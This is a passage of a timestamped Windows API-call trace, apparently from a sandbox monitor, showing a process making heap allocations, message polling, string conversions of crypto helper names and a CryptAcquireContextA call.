[0215.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0215.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0215.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0215.588] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0215.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0215.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0215.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0215.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0215.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0215.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0215.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0215.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0215.589] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0215.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0215.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0215.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0215.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0215.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0215.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0215.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0215.589] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.589] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0215.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fca8 | out: hHeap=0x970000) returned 1 [0215.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0215.589] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0215.589] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0215.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69a68, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0215.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0215.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0215.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69c08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0215.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0215.590] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0215.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0215.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0215.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0215.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0215.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0215.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0215.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0215.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0215.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0215.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0215.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0215.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0215.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0215.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0215.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0215.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0215.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0215.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0215.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0215.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0215.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0215.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0215.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0215.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0215.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0215.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0215.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0215.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0215.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0215.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0215.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0215.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0215.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0215.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0215.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0215.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0215.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0215.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0215.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0215.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0215.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0215.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0215.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0215.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0215.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0215.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0215.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0215.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0215.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0215.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0215.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0215.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0215.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0215.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0215.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0215.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0215.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0215.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0215.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0215.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0215.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0215.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0215.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0215.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0215.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0215.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0215.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0215.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0215.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0215.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0215.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0215.593] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0215.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0215.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0215.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0215.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0215.594] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0215.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0215.594] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0215.594] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0215.594] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.594] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.594] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.594] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fca8 [0215.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0215.594] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0215.594] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0215.594] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.594] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0215.595] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0215.595] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0215.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0215.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0215.595] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0215.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0215.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0215.595] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0215.595] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0215.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0215.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0215.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0215.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0215.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0215.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0215.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0215.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0215.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0215.596] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0215.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0215.596] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0215.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0215.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0215.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0215.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0215.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0215.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0215.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0215.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0215.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0215.596] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0215.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0215.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0215.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0215.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0215.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0215.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0215.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0215.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0215.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0215.596] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0215.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0215.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0215.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0215.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0215.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0215.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0215.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0215.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0215.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0215.597] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0215.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0215.597] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0215.597] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0215.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0215.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0215.597] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0215.597] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0215.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0215.597] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.597] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0215.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0215.598] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0215.598] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0215.598] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.598] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0215.598] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0215.598] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0215.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0215.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0215.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0215.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fea0 [0215.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0215.598] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0215.598] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 